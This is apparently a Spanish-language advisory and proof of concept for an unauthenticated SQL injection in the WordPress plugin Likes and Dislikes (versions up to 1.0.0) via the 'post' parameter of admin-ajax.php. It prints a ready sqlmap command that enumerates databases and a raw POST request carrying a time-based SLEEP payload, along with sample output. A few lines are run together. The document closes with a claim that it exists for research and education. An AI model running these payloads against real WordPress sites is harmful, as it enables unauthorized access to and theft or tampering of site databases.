
El plugin de WordPress Likes and Dislikes <= 1.0.0 es vulnerable a inyección SQL.
Descubierto por: Khaled_Alenazi (Nxploited)
Publicado el: 27 de mayo de 2025
El plugin Likes and Dislikes para WordPress es vulnerable a inyección SQL a través del parámetro post en todas las versiones hasta la 1.0.0 inclusive.
Debido a un escape insuficiente y a la falta de consultas preparadas, los atacantes no autenticados pueden inyectar SQL sin procesar en las consultas del backend, lo que conduce a fuga o manipulación de datos.
post/wp-admin/admin-ajax.phpsqlmap -u "http://TARGET/wp-admin/admin-ajax.php" \
--data "action=my_likes_dislikes_action&post=1&state=like" \
--method POST --risk 3 --level 5 --batch --time-sec=5 --dbs
Este comando confirma el punto de inyección y enumera las bases de datos mediante una técnica basada en tiempo.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: nxploit.ddev.site
Content-Type: application/x-www-form-urlencoded
Connection: close
action=my_likes_dislikes_action&post=1 AND (SELECT 1234 FROM (SELECT(SLEEP(5)))a)&state=like
Enumeración con SQLMap:
boolean-based blind y time-based blind.db, test, information_schema.
Verificación manual con Burp Suite:
15 seconds, lo que indica una inyección real.
post.Este contenido se proporciona solo con fines educativos y de investigación.
El autor no aprueba la actividad maliciosa ni la explotación de sistemas sin autorización explícita.
Khaled_Alenazi (Nxploited)